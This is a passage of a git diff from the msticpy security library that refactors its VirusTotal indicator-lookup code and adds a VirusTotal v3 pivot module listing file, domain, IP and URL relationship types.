-                lambda x: x.to_dict(), axis=1).tolist()
+        if output == "dict":
+            list_res = self.results.apply(lambda x: x.to_dict(), axis=1).tolist()
             return list_res[0] if len(list_res) == 1 else list_res
-        else:
-            return self.results
 
-    def _lookup_ioc_type(self, input_frame: pd.DataFrame, ioc_type: str, src_col: str,
-                         src_index_col: str):
+        return self.results
+
+    # pylint: disable=too-many-locals
+    def _lookup_ioc_type(
+        self,
+        input_frame: pd.DataFrame,
+        ioc_type: str,
+        src_col: str,
+        src_index_col: Optional[str],
+    ):
         """
         Perform the VT submission of a set of IoCs of a given type.
 
-            :param self:
-            :param input_frame: the input dataframe
-            :param ioc_type: the IoC Type to submit
-            :param src_col: The name column in the dataframe
-                containing the IoC observables
-            :para source_index_col
+        Parameters
+        ----------
+        input_frame : pd.DataFrame
+            the input dataframe
+        ioc_type : str
+            the IoC Type to submit
+        src_col : str
+            The name column in the dataframe containing the
+            IoC observables
+        src_index_col : Optional[str]
+            SourceIndex column name
+
+        Raises
+        ------
+        KeyError
+            Unknown ioc_type
+
         """
-        assert(ioc_type in self._VT_TYPE_MAP and
-               self._VT_TYPE_MAP[ioc_type] in self._VT_API_TYPES)
+        if ioc_type not in self._VT_TYPE_MAP:
+            raise KeyError(f'Unknown ioc_type "{ioc_type}""')
+
         vt_param = self._VT_API_TYPES[self._VT_TYPE_MAP[ioc_type]]
 
         # Some types support batch lookups so we can assemble them into batches
@@ -263,45 +401,62 @@ def _lookup_ioc_type(self, input_frame: pd.DataFrame, ioc_type: str, src_col: st
                 batch_index += 1
 
             # We want to trigger in the following circumstances
-            # 1. if the length of our batch is at the max VT batchsize for this type
-            #   (If the batch size is 1 this will fire for every row)
+            # 1. if the length of our batch is at the max VT batchsize for
+            # this type (If the batch size is 1 this will fire for every row)
             # 2. Or we have reached the end of our row iteration
             # AND
             # 3. The batch is not empty
-            if ((len(obs_batch) == vt_param.batch_size or row_num == row_count) and
-                    obs_batch):
+            if (
+                len(obs_batch) == vt_param.batch_size or row_num == row_count
+            ) and obs_batch:
                 obs_submit = vt_param.batch_delimiter.join(obs_batch)
 
                 self._print_status(
-                    'Submitting observables: "{}", type "{}" to VT. (Source index {})'
-                    .format(obs_submit, ioc_type, idx), 2)
+                    (
+                        "Submitting observables: "
+                        + f'"{obs_submit}", type "{ioc_type}" '
+                        + "to VT. (Source index {idx})"
+                    ),
+                    2,
+                )
                 # Submit the request
-                results, status_code = self._vt_submit_request(
-                    obs_submit, vt_param)
+                results, status_code = self._vt_submit_request(obs_submit, vt_param)
 
                 if status_code != 200:
                     # Print status messages and add failure cases to results
-                    status = 'Failed submission: http error {}'.format(status_code)
+                    status = f"Failed submission: http error {status_code}"
                     for failed_obs in obs_batch:
-                        self._add_invalid_input_result(failed_obs, ioc_type, status,
-                                                       source_row_index[failed_obs])
+                        self._add_invalid_input_result(
+                            failed_obs, ioc_type, status, source_row_index[failed_obs]
+                        )
                         self._print_status(
-                            'Error in response submitting observables: "{}", type "{}" '
-                            'http status is {}. Response: {} (Source index {})'
-                            .format(obs_submit, ioc_type, status_code, results,
-                                    source_row_index[failed_obs]), 1)
+                            "Error in response submitting observables: "
+                            f"'{obs_submit}', type '{ioc_type}'"
+                            f"http status is {status_code}. "
+                            f"Response: {results} "
+                            f"(Source index {source_row_index[failed_obs]}",
+                            1,
+                        )
                 else:
                     # parse the results from the response
                     self._parse_vt_results(
-                        results, obs_submit, ioc_type, idx, source_row_index, vt_param)
+                        results, obs_submit, ioc_type, idx, source_row_index, vt_param
+                    )
 
                 # reset index of batch
                 batch_index = 0
                 obs_batch = []
 
-    def _parse_vt_results(self, vt_results: any, observable: str, ioc_type: str,
-                          source_idx: any = 0,
-                          source_row_index: any = None, vt_param: VTParams = None):
+    # pylint: disable=too-many-arguments, too-many-branches
+    def _parse_vt_results(  # noqa: C901 MC0001
+        self,
+        vt_results: Any,
+        observable: str,
+        ioc_type: str,
+        source_idx: Any = 0,
+        source_row_index: Any = None,
+        vt_param: VTParams = None,
+    ):
         """
         Parse VirusTotal results based on IoCType.
 
@@ -312,148 +467,208 @@ def _parse_vt_results(self, vt_results: any, observable: str, ioc_type: str,
             :param source_row_index: (batch only) Mapping between observable item
                 and row index of the source
             :param vt_param: (batch only) the VTParams tuple for this submission
+
         """
-        results_to_parse = []
+        results_to_parse = []  # type: List[dict]
         if isinstance(vt_results, str):
             try:
                 vt_results = json.loads(vt_results, strict=False)
             except (JSONDecodeError, TypeError):
                 pass
 
-        if isinstance(vt_results, list) and vt_param.batch_size > 1:
+        if (
+            isinstance(vt_results, list)
+            and vt_param is not None
+            and vt_param.batch_size > 1
+        ):
             # multiple results
             results_to_parse = vt_results
         elif isinstance(vt_results, dict):
             # single result
             results_to_parse.append(vt_results)
         else:
-            self._print_status('Error parsing response to JSON: "{}", type "{}". (Source index {})'
-                               .format(observable, ioc_type, source_idx), 1)
+            self._print_status(
+                (
+                    "Error parsing response to JSON: "
+                    + f'"{observable}", type "{ioc_type}". '
+                    + f"(Source index {source_idx})"
+                ),
+                1,
+            )
 
         if vt_param and vt_param.batch_delimiter:
             observables = observable.split(vt_param.batch_delimiter)
         else:
             observables = [observable]
 
-        # pylint: disable=locally-disabled, C0200
-        for result_idx in range(0, len(results_to_parse)):
-            df_dict_vtresults = self._parse_single_result(results_to_parse[result_idx], ioc_type)
+        # pylint: disable=locally-disabled, consider-using-enumerate
+        for result_idx in range(len(results_to_parse)):
+            df_dict_vtresults = self._parse_single_result(
+                results_to_parse[result_idx], ioc_type
+            )
 
             # Add remaining fields from source
-            df_dict_vtresults['IoCType'] = ioc_type
-            df_dict_vtresults['Status'] = 'Success'
-            df_dict_vtresults['RawResponse'] = json.dumps(results_to_parse[result_idx])
-            if len(results_to_parse) == 1 or source_row_index is None or len(source_row_index) == 1:
-                df_dict_vtresults['Observable'] = observable
-                df_dict_vtresults['SourceIndex'] = source_idx
-            else:
+            df_dict_vtresults["IoCType"] = ioc_type
+            df_dict_vtresults["Status"] = "Success"
+            df_dict_vtresults["RawResponse"] = json.dumps(results_to_parse[result_idx])
+            if (
+                len(results_to_parse) == 1
+                or source_row_index is None
+                or len(source_row_index) == 1
+            ):
+                df_dict_vtresults["Observable"] = observable
+                df_dict_vtresults["SourceIndex"] = source_idx
+            elif "resource" in results_to_parse[result_idx]:
                 # If we submitted multiple values in a batch
                 # we assume (hope) that the ordering of the response is the same
-                # as in the request. We try our best to remarry the observable
+                # as in the request. We try our best to re-marry the observable
                 # and source index
-                if 'resource' in results_to_parse[result_idx]:
-                    vt_resource = results_to_parse[result_idx]['resource']
-                    df_dict_vtresults['Observable'] = vt_resource
-                    if vt_resource in source_row_index:
-                        df_dict_vtresults['SourceIndex'] = source_row_index[vt_resource]
-                    else:
-                        df_dict_vtresults['SourceIndex'] = source_row_index[observables[result_idx]]
+                vt_resource = results_to_parse[result_idx]["resource"]
+                df_dict_vtresults["Observable"] = vt_resource
+                if vt_resource in source_row_index:
+                    df_dict_vtresults["SourceIndex"] = source_row_index[vt_resource]
                 else:
-                    df_dict_vtresults['Observable'] = observables[result_idx]
-                    df_dict_vtresults['SourceIndex'] = source_row_index[observables[result_idx]]
-
-            if pd_version_23():
-                new_results = pd.concat(
-                    objs=[self.results, df_dict_vtresults], ignore_index=True, sort=False, axis=0)
+                    df_dict_vtresults["SourceIndex"] = source_row_index[
+                        observables[result_idx]
+                    ]
             else:
-                new_results = pd.concat(
-                    objs=[self.results, df_dict_vtresults], ignore_index=True, axis=0)
+                df_dict_vtresults["Observable"] = observables[result_idx]
+                df_dict_vtresults["SourceIndex"] = source_row_index[
+                    observables[result_idx]
+                ]
+
+            new_results = pd.concat(
+                objs=[self.results, df_dict_vtresults], ignore_index=True, axis=0
+            )
 
             self.results = new_results
         # pylint enable=locally-disabled, C0200
 
-    def _parse_single_result(self, results_dict: dict({str: any}), ioc_type: str) -> pd.DataFrame:
+    def _parse_single_result(
+        self, results_dict: Mapping[str, Any], ioc_type: str
+    ) -> pd.DataFrame:
         """
         Parse VirusTotal single result based on IoCType.
 
-            :param results_dict: Raw results dictionary from VT
-            :param ioc_type: The IoC type of the observables
+        Parameters
+        ----------
+        results_dict : Mapping[str, Any]
+            Raw results dictionary from VT
+        ioc_type : str
+            The IoC type of the observables
+
+        Returns
+        -------
+        pd.DataFrame
+            The results DataFrame
+
         """
         # create output frame and parse results to intermediate frame
         df_dict_vtresults = {}
 
         # Parse returned results to our output dataframe depending
         # on the IoC type
-        if ioc_type in ['url', 'md5_hash', 'sha1_hash', 'sha256_hash']:
-            df_dict_vtresults['ResponseCode'] = results_dict['response_code']
-            df_dict_vtresults['VerboseMsg'] = results_dict['verbose_msg']
-            df_dict_vtresults['ScanId'] = results_dict['scan_id']
-            df_dict_vtresults['Resource'] = results_dict['resource']
-            df_dict_vtresults['Permalink'] = results_dict['permalink']
-            df_dict_vtresults['Positives'] = results_dict['positives']
-            if ioc_type in ['md5_hash', 'sha1_hash', 'sha256_hash']:
-                df_dict_vtresults['MD5'] = results_dict['md5']
-                df_dict_vtresults['SHA1'] = results_dict['sha1']
-                df_dict_vtresults['SHA256'] = results_dict['sha256']
-
-        if ioc_type == 'ipv4' or ioc_type == 'dns':
-            df_dict_vtresults['ResponseCode'] = results_dict['response_code']
-            df_dict_vtresults['VerboseMsg'] = results_dict['verbose_msg']
+        if ioc_type in ["url", "md5_hash", "sha1_hash", "sha256_hash"]:
+            df_dict_vtresults["ResponseCode"] = results_dict.get("response_code", None)
+            df_dict_vtresults["VerboseMsg"] = results_dict.get("verbose_msg", None)
+            df_dict_vtresults["ScanId"] = results_dict.get("scan_id", None)
+            df_dict_vtresults["Resource"] = results_dict.get("resource", None)
+            df_dict_vtresults["Permalink"] = results_dict.get("permalink", None)
+            df_dict_vtresults["Positives"] = results_dict.get("positives", None)
+            if ioc_type in ["md5_hash", "sha1_hash", "sha256_hash"]:
+                df_dict_vtresults["MD5"] = results_dict.get("md5", None)
+                df_dict_vtresults["SHA1"] = results_dict.get("sha1", None)
+                df_dict_vtresults["SHA256"] = results_dict.get("sha256", None)
+
+        if ioc_type in ["ipv4", "dns"]:
+            df_dict_vtresults["ResponseCode"] = results_dict.get("response_code", None)
+            df_dict_vtresults["VerboseMsg"] = results_dict.get("verbose_msg", None)
             # dns and ipv4 have multi-valued 'resolutions' and 'detected_urls' lists
             # of dictionaries
             # This leads to a few horrendous-looking list comprehensions
             # These are essentially pulling out the columns that contain these lists.
             # then using a list comprehension to pull out the value, where the key 'k'
             # is of the required value
-            if ioc_type == 'ipv4' and 'resolutions' in results_dict:
-                item_list = [item['hostname']
-                             for item in results_dict['resolutions'] if 'hostname' in item]
-                df_dict_vtresults['ResolvedDomains'] = ', '.join(item_list)
-            elif ioc_type == 'dns' and 'resolutions' in results_dict:
-                item_list = [item['ip_address']
-                             for item in results_dict['resolutions'] if 'ip_address' in item]
-                df_dict_vtresults['ResolvedIPs'] = ', '.join(item_list)
-            if 'detected_urls' in results_dict:
-                item_list = [item['url']
-                             for item in results_dict['detected_urls'] if 'url' in item]
-                df_dict_vtresults['DetectedUrls'] = ', '.join(item_list)
-                # positives are listed per detected_url so we need to pull those our and sum them.
-                positives = sum([item['positives']
-                                 for item in results_dict['detected_urls']
-                                 if 'positives' in item])
-                df_dict_vtresults['Positives'] = positives
-
-        return pd.DataFrame(data=df_dict_vtresults, columns=self._RESULT_COLUMNS, index=[0])
-
-    def _validate_observable(self, observable: str, ioc_type: str, idx: any):
+            if ioc_type == "ipv4" and "resolutions" in results_dict:
+                item_list = [
+                    item["hostname"]
+                    for item in results_dict["resolutions"]
+                    if "hostname" in item
+                ]
+                df_dict_vtresults["ResolvedDomains"] = ", ".join(item_list)
+            elif ioc_type == "dns" and "resolutions" in results_dict:
+                item_list = [
+                    item["ip_address"]
+                    for item in results_dict["resolutions"]
+                    if "ip_address" in item
+                ]
+                df_dict_vtresults["ResolvedIPs"] = ", ".join(item_list)
+            if "detected_urls" in results_dict:
+                item_list = [
+                    item["url"]
+                    for item in results_dict["detected_urls"]
+                    if "url" in item
+                ]
+                df_dict_vtresults["DetectedUrls"] = ", ".join(item_list)
+                # positives are listed per detected_url so we need to
+                # pull those our and sum them.
+                positives = sum(
+                    [
+                        item["positives"]
+                        for item in results_dict["detected_urls"]
+                        if "positives" in item
+                    ]
+                )
+                df_dict_vtresults["Positives"] = positives
+
+        return pd.DataFrame(
+            data=df_dict_vtresults, columns=self._RESULT_COLUMNS, index=[0]
+        )
+
+    def _validate_observable(
+        self, observable: str, ioc_type: str, idx: Any
+    ) -> SanitizedObservable:
         """
         Validate observable for format and duplicates of existing results.
 
-        Arguments:
-            :param observable:str: The observable to be checked
-            :param ioc_type:str: The IoCType of the observable
-            :param idx:any: The index of the source row
+        Parameters
+        ----------
+        observable : str
+            The observable to be checked
+        ioc_type : str
+            The IoCType of the observable
+        idx : Any
+            The index of the source row
 
-        Returns:
-            PreProcessResult
+        Returns
+        -------
+        SanitizedObservable
+            The Pre-processed result
 
         """
         if observable is None or observable.strip() is None:
-            status = 'Failed: Empty or missing observable value'
-            self._add_invalid_input_result(
-                observable, ioc_type, status, idx)
-            self._print_status(status + ' (Source index {})'.format(idx), 1)
-            return PreProcessResult(None, status)
+            status = "Failed: Empty or missing observable value"
+            self._add_invalid_input_result(observable, ioc_type, status, idx)
+            self._print_status(f"{status} (Source index {idx})", 1)
+            return SanitizedObservable(None, status)
 
         # Check that observable is of the correct format for this type
         # and do any cleaning up required
-        pp_observable = self._preprocess_observable(observable, ioc_type)
+        pp_observable = preprocess_observable(observable, ioc_type)
         if pp_observable.observable is None:
-            self._add_invalid_input_result(observable, ioc_type, pp_observable.status, idx)
+            self._add_invalid_input_result(
+                observable, ioc_type, pp_observable.status, idx
+            )
             # pylint: disable=locally-disabled, line-too-long
             self._print_status(
-                'Invalid observable format: "{}", type "{}", status: {} - skipping. (Source index {})'
-                .format(observable, ioc_type, pp_observable.status, idx), 2)
+                (
+                    f'Invalid observable format: "{observable}", '
+                    + f'type "{ioc_type}", '
+                    + f"status: {pp_observable.status} "
+                    + f"- skipping. (Source index {idx})"
+                ),
+                2,
+            )
             # pylint: enable=locally-disabled, line-too-long
             return pp_observable
 
@@ -462,256 +677,136 @@ def _validate_observable(self, observable: str, ioc_type: str, idx: any):
         if dup_result.is_dup:
             # pylint: disable=locally-disabled, line-too-long
             self._print_status(
-                'Duplicate observable value detected: "{}", type "{}" status: {} - skipping. (Source index {})'
-                .format(observable, ioc_type, dup_result.status, idx), 2)
-            return PreProcessResult(None, dup_result.status)
+                (
+                    "Duplicate observable value detected: "
+                    + f'"{observable}", type "{ioc_type}" '
+                    + f"status: {dup_result.status} "
+                    + f"- skipping. (Source index {idx})"
+                ),
+                2,
+            )
+            return SanitizedObservable(None, dup_result.status)
 
         return pp_observable
 
-    def _check_duplicate_submission(self, observable, ioc_type, source_index) -> DuplicateStatus:
+    def _check_duplicate_submission(
+        self, observable: str, ioc_type: str, source_index: Any
+    ) -> DuplicateStatus:
         """
         Check for a duplicate value in existing results.
 
-        If duplicate found, add a new result row that is a reference to
-        the duplicated result row
-            :param observable: The IoC observable value
-            :param ioc_type: The IoC type
-            :param source_idx: The index of the source DataFrame row
+        Parameters
+        ----------
+        observable : str
+             The IoC observable value
+        ioc_type : str
+            The IoC type
+        source_index : Any
+            The index of the source DataFrame row
 
-        Returns:
-            DuplicateStatus{bool, str}
+        Returns
+        -------
+        DuplicateStatus
+            Status indicating whether this is a duplicate.
 
         """
         if self.results is None:
-            return DuplicateStatus(False, 'ok')
+            return DuplicateStatus(False, "ok")
 
         # Note duplicate var here can be multiple rows of past results
-        duplicate = self.results[self.results['Observable'] == observable].copy()
-        # if this is a file hash we should check for previous results in all of the hash
-        # columns
-        if duplicate.shape[0] == 0 and ioc_type in ['md5_hash', 'sha1_hash', 'sh256_hash']:
-            dup_query = 'MD5 == @observable or SHA1 == @observable or SHA256 == @observable'
+        duplicate = self.results[self.results["Observable"] == observable].copy()
+        # if this is a file hash we should check for previous results in
+        # all of the hash columns
+        if duplicate.shape[0] == 0 and ioc_type in [
+            "md5_hash",
+            "sha1_hash",
+            "sh256_hash",
+        ]:
+            dup_query = (
+                "MD5 == @observable or SHA1 == @observable or SHA256 == @observable"
+            )
             duplicate = self.results.query(dup_query).copy()
-            # In these cases we want to set the observable to the source value but keep the
-            # rest of the results
+            # In these cases we want to set the observable to the source value
+            # but keep the rest of the results
             if duplicate.shape[0] > 0:
-                duplicate['Observable'] = observable
+                duplicate["Observable"] = observable
 
         # if we found a duplicate so add the copies of the duplicated requests
         # to the results
         if duplicate.shape[0] > 0:
-            original_indices = [v[0] for v in duplicate[['SourceIndex']].values]
-            duplicate['SourceIndex'] = source_index
-            duplicate['Status'] = 'Duplicate'
-            if pd_version_23():
-                new_results = pd.concat(
-                    objs=[self.results, duplicate], ignore_index=True, sort=False, axis=0)
-            else:
-                new_results = pd.concat(
-                    objs=[self.results, duplicate], ignore_index=True, axis=0)
+            original_indices = [v[0] for v in duplicate[["SourceIndex"]].values]
+            duplicate["SourceIndex"] = source_index
+            duplicate["Status"] = "Duplicate"
+            new_results = pd.concat(
+                objs=[self.results, duplicate], ignore_index=True, sort=False, axis=0
+            )
             self.results = new_results
 
-            return DuplicateStatus(True, 'Duplicates of {}'.format(original_indices))
+            return DuplicateStatus(True, f"Duplicates of {original_indices}")
 
-        return DuplicateStatus(False, 'ok')
+        return DuplicateStatus(False, "ok")
 
-    def _add_invalid_input_result(self, observable, ioc_type, status, source_idx):
+    def _add_invalid_input_result(
+        self, observable: str, ioc_type: str, status: str, source_idx: Any
+    ):
         """
         Add a result row to indicate an invalid submission.
 
-            :param observable: The IoC observable value
-            :param ioc_type: The IoC type
-            :param status: The status - why the item was invalid
-            :param source_idx: The index of the source DataFrame row
+        Parameters
+        ----------
+        observable : str
+            The IoC observable value
+        ioc_type : str
+            The IoC type
+        status : str
+            The status - why the item was invalid
+        source_idx : Any
+            The index of the source DataFrame row
+
         """
         new_row = pd.Series(index=self._RESULT_COLUMNS)
-        new_row['Observable'] = observable
-        new_row['IoCType'] = ioc_type
-        new_row['Status'] = status
-        new_row['SourceIndex'] = source_idx
+        new_row["Observable"] = observable
+        new_row["IoCType"] = ioc_type
+        new_row["Status"] = status
+        new_row["SourceIndex"] = source_idx
         new_results = self.results.append(new_row.to_dict(), ignore_index=True)
 
         self.results = new_results
 
-    def _vt_submit_request(self, submission_string, vt_param):
+    def _vt_submit_request(
+        self, submission_string: str, vt_param: VTParams
+    ) -> Tuple[Optional[Dict[Any, Any]], int]:
         """
         Submit the request to VT.
 
-            :param submission_string: The observable (or observable collection)
-            :param vt_param: VT parameters appropriate to this observable type
+        Parameters
+        ----------
+        submission_string : str
+            The observable (or observable collection)
+        vt_param : VTParams
+            VT parameters appropriate to this observable type
+
         """
-        params = {'apikey': self._vtkey,
-                  vt_param.api_var_name: submission_string}
+        params = {"apikey": self._vtkey, vt_param.api_var_name: submission_string}
         submit_url = self._get_vt_api_url(vt_param.api_type)
-        headers = {'User-Agent': 'VirusTotal',
-                   'Content-Type': 'application/json'}
+        headers = {"User-Agent": "VirusTotal", "Content-Type": "application/json"}
         if vt_param.headers is not None:
             for hdr, val in vt_param.headers.items():
                 headers[hdr] = val
 
-        if vt_param.http_verb == 'post':
-            response = requests.post(submit_url, data=params, headers=headers)
+        if vt_param.http_verb == "post":
+            response = httpx.post(submit_url, data=params, headers=headers)
         else:
-            response = requests.get(submit_url, params=params, headers=headers)
+            response = httpx.get(submit_url, params=params, headers=headers)
         if response.status_code == 200:
             return response.json(), response.status_code
-        else:
-            if response:
-                try:
-                    return response.json(), response.status_code
-                except JSONDecodeError:
-                    pass
-            return None, response.status_code
-
-    def _preprocess_observable(self, observable, ioc_type) -> PreProcessResult:
-        """
-        Preprocesses and checks validity of observable against declared IoC type.
 
-            :param observable: the value of the IoC
-            :param ioc_type: the IoC type
-        """
-        observable = observable.strip()
-        if not self._ioc_extract.validate(observable, ioc_type):
-            return PreProcessResult(None,
-                                    'Observable does not match expected pattern for ' + ioc_type)
-        if ioc_type == 'url':
-            return self._preprocess_url(observable)
-        if ioc_type == 'ipv4':
-            return self._preprocess_ip4(observable)
-        if ioc_type == 'dns':
-            return self._preprocess_dns(observable)
-        if ioc_type in ['md5_hash', 'sha1_hash', 'sha256_hash']:
-            return self._preprocess_hash(observable)
-        return PreProcessResult(observable, 'ok')
-
-    @classmethod
-    def _preprocess_url(cls, url: str) -> PreProcessResult:
-        """
-        Check that URL can be parsed.
-
-            :param cls: the class
-            :param url: the URL to check
-        """
-        try:
-            scheme, _, host, _, _, _, _ = parse_url(url)
-            clean_url = url
-        except LocationParseError:
-            # Try to clean URL and re-check
-            clean_url = cls._clean_url(url)
-            if clean_url is None:
-                return PreProcessResult(None, 'Could not parse as valid URL')
+        if response:
             try:
-                scheme, _, host, _, _, _, _ = parse_url(clean_url)
-            except LocationParseError:
-                return PreProcessResult(None, 'Could not parse as valid URL')
-
-        if scheme is None or host is None:
-            return PreProcessResult(None, f'url scheme or host missing from {url}')
-        # get rid of some obvious false positives (localhost, local hostnames)
-        try:
-            addr = ip_address(host)
-            if addr.is_private:
-                return PreProcessResult(None, 'Host part of URL is a private IP address')
-            if addr.is_loopback:
-                return PreProcessResult(None, 'Host part of URL is a loopback IP address')
-        except ValueError:
-            pass
-
-        if '.' not in host:
-            return PreProcessResult(None, 'Host is unqualified domain name')
-
-        if scheme.lower() in ['file']:
-            return PreProcessResult(None, f'{scheme} URL scheme is not supported')
-
-        return PreProcessResult(clean_url, 'ok')
-
-    @classmethod
-    def _clean_url(cls, url: str) -> str:
-        """
-        Clean URL to remove query params and fragments and any trailing stuff.
-
-            :param cls: the class
-            :param url: the URL to check
-        """
-        # slightly stricter than normal URL regex to exclude '() from host string
-        http_strict_regex = r'''
-            (?P<protocol>(https?|ftp|telnet|ldap|file)://)
-            (?P<userinfo>([a-z0-9-._~!$&*+,;=:]|%[0-9A-F]{2})*@)?
-            (?P<host>([a-z0-9-._~!$&\*+,;=]|%[0-9A-F]{2})*)
-            (:(?P<port>\d*))?
-            (/(?P<path>([^?\#| ]|%[0-9A-F]{2})*))?
-            (\?(?P<query>([a-z0-9-._~!$&'()*+,;=:/?@]|%[0-9A-F]{2})*))?
-            (\#(?P<fragment>([a-z0-9-._~!$&'()*+,;=:/?@]|%[0-9A-F]{2})*))?\b'''
-        if cls._http_strict_rgxc is None:
-            cls._http_strict_rgxc = re.compile(
-                http_strict_regex, re.I | re.X | re.M)
-
-        # Try to clean URL and re-check
-        match_url = cls._http_strict_rgxc.search(url)
-        if (match_url.groupdict()['protocol'] is None or
-                match_url.groupdict()['host'] is None):
-            return None, 'Could not parse as valid URL'
-
-        # build the URL dropping the query string and fragments
-        clean_url = match_url.groupdict()['protocol']
-        if match_url.groupdict()['userinfo']:
-            clean_url += match_url.groupdict()['userinfo']
-        clean_url += match_url.groupdict()['host']
-        if match_url.groupdict()['port']:
-            clean_url += ':' + match_url.groupdict()['port']
-        if match_url.groupdict()['path']:
-            clean_url += '/' + match_url.groupdict()['path']
-
-        return clean_url
-
-    @classmethod
-    def _preprocess_ip4(cls, ipaddress: str):
-        """Ensure Ip address is a valid public IPv4 address."""
-        try:
-            addr = ip_address(ipaddress)
-        except ValueError:
-            return PreProcessResult(None, 'IP address is invalid format')
-
-        if not isinstance(addr, IPv4Address):
-            return PreProcessResult(None, 'Not an IPv4 address')
-        if addr.is_global:
-            return PreProcessResult(ipaddress, 'ok')
-        if addr.is_private:
-            return PreProcessResult(None, 'IP is private address')
-        if addr.is_loopback:
-            return PreProcessResult(None, 'IP is loopback address')
-        if addr.is_reserved:
-            return PreProcessResult(None, 'IP is reserved address')
-        if addr.is_multicast:
-            return PreProcessResult(None, 'IP is multicast address')
-        return PreProcessResult(None, 'IP address is not global')
-
-    @classmethod
-    def _preprocess_dns(cls, domain: str) -> PreProcessResult:
-        """Ensure DNS is a valid-looking domain."""
-        if '.' not in domain:
-            return PreProcessResult(None, 'Domain is unqualified domain name')
-        try:
-            addr = ip_address(domain)
-            del addr
-            return PreProcessResult(None, 'Domain is an IP address')
-        except ValueError:
-            return PreProcessResult(domain, 'ok')
-
-    @classmethod
-    def _preprocess_hash(cls, hash_str: str) -> PreProcessResult:
-        """Ensure Hash has minimum entropy (rather than a string of 'x')."""
-        str_entropy = cls.entropy(hash_str)
-        if str_entropy < 3.0:
-            return PreProcessResult(None, 'String has too low an entropy to be a hash')
-        return PreProcessResult(hash_str, 'ok')
-
-    @classmethod
-    def entropy(cls, input_str: str) -> float:
-        """Compute entropy of input string."""
-        str_len = float(len(input_str))
-        return -sum(map(lambda a: (a / str_len) * math.log2(a / str_len),
-                        Counter(input_str).values()))
+                return response.json(), response.status_code
+            except JSONDecodeError:
+                pass
+        return None, response.status_code
 
     @classmethod
     def _get_vt_api_url(cls, api_type: str) -> str:
@@ -721,20 +816,27 @@ def _get_vt_api_url(cls, api_type: str) -> str:
             :param api_type: The IoC type
         """
         if api_type not in cls._VT_API_TYPES:
-            raise LookupError('Unknown api type "{}"'.format(api_type))
+            raise LookupError(f"Unknown api type '{api_type}'")
         return cls._VT_API.format(type=api_type)
 
     @classmethod
-    def _get_supported_vt_ioc_types(cls) -> list({str}):
+    def _get_supported_vt_ioc_types(cls) -> List[str]:
         """Return the subset of IoC types supported by VT."""
-        return [t for t in cls._SUPPORTED_INPUT_TYPES if cls._VT_TYPE_MAP[t] is not None]
+        return [
+            t for t in cls._SUPPORTED_INPUT_TYPES if cls._VT_TYPE_MAP[t] is not None
+        ]
 
-    def _print_status(self, message: str, verbosity_level: str):
+    def _print_status(self, message: str, verbosity_level: int):
         """
         Print a status message depending on the current level of verbosity.
 
-            :param message: the string message to print
-            :param verbosity_level: at which level the message should be output
+        Parameters
+        ----------
+        message : str
+            the string message to print
+        verbosity_level : int
+            verbosity_level at which level the message should be output
+
         """
         if verbosity_level <= self._verbosity:
             print(message)
diff --git a/msticpy/sectools/vtlookupv3/__init__.py b/msticpy/sectools/vtlookupv3/__init__.py
new file mode 100644
index 000000000..80ba8885e
--- /dev/null
+++ b/msticpy/sectools/vtlookupv3/__init__.py
@@ -0,0 +1,18 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""VirusTotal V3 Subpackage."""
+
+from ..._version import VERSION
+
+# pylint: disable=unused-import
+# flake8: noqa: F401
+from .vt_pivot import add_pivot_functions
+from .vtfile_behavior import VTFileBehavior
+from .vtlookupv3 import VTLookupV3, VT_API_NOT_FOUND, MsticpyVTNoDataError
+from .vtobject_browser import VTObjectBrowser
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
diff --git a/msticpy/sectools/vtlookupv3/vt_pivot.py b/msticpy/sectools/vtlookupv3/vt_pivot.py
new file mode 100644
index 000000000..588ad4de9
--- /dev/null
+++ b/msticpy/sectools/vtlookupv3/vt_pivot.py
@@ -0,0 +1,185 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""VirusTotal Pivot functions."""
+from enum import Flag, auto
+from functools import partial
+from typing import Dict, Optional, Tuple, Union
+
+from ..._version import VERSION
+from .vtlookupv3 import VTLookupV3
+from ...common.utility import enum_parse
+from ...common.provider_settings import get_provider_settings
+from ...datamodel.pivot import Pivot, PivotRegistration
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+_USE_PRIVATE_API_KEY = "UseVT3PrivateAPI"
+
+
+class VTAPIScope(Flag):
+    """VT API Type enumeration."""
+
+    PUBLIC = auto()
+    PRIVATE = auto()
+    ALL = PUBLIC | PRIVATE
+
+
+FILE_RELATIONSHIPS = {
+    "bundled_files": VTAPIScope.PUBLIC,
+    "contacted_domains": VTAPIScope.PUBLIC,
+    "contacted_ips": VTAPIScope.PUBLIC,
+    "contacted_urls": VTAPIScope.PUBLIC,
+    "dropped_files": VTAPIScope.PUBLIC,
+    "execution_parents": VTAPIScope.PUBLIC,
+    "email_attachments": VTAPIScope.PRIVATE,
+    "email_parents": VTAPIScope.PRIVATE,
+    "embedded_domains": VTAPIScope.PRIVATE,
+    "embedded_ips": VTAPIScope.PRIVATE,
+    "embedded_urls": VTAPIScope.PRIVATE,
+    "sigma_analysis": VTAPIScope.PRIVATE,
+    "similar_files": VTAPIScope.PRIVATE,
+}
+
+DOMAIN_RELATIONSHIPS = {
+    "communicating_files": VTAPIScope.PUBLIC,
+    "historical_whois": VTAPIScope.PUBLIC,
+    "historical_ssl_certificates": VTAPIScope.PUBLIC,
+    "parent": VTAPIScope.PUBLIC,
+    "resolutions": VTAPIScope.PUBLIC,
+    "subdomains": VTAPIScope.PUBLIC,
+    "downloaded_files": VTAPIScope.PRIVATE,
+    "ns_records": VTAPIScope.PRIVATE,
+    "urls": VTAPIScope.PRIVATE,
+}
+
+IP_RELATIONSHIPS = {
+    "communicating_files": VTAPIScope.PUBLIC,
+    "historical_whois": VTAPIScope.PUBLIC,
+    "historical_ssl_certificates": VTAPIScope.PUBLIC,
+    "referrer_files": VTAPIScope.PUBLIC,
+    "resolutions": VTAPIScope.PUBLIC,
+    "subdomains": VTAPIScope.PUBLIC,
+    "downloaded_files": VTAPIScope.PRIVATE,
+    "urls": VTAPIScope.PRIVATE,
+}
+
+URL_RELATIONSHIPS = {
+    "last_serving_ip_address": VTAPIScope.PUBLIC,
+    "network_location": VTAPIScope.PUBLIC,
+    "communicating_files": VTAPIScope.PUBLIC,
+    "contacted_domains": VTAPIScope.PUBLIC,
